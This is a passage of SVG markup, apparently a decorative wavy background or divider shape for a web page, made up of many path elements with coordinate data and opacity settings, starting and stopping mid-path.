.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 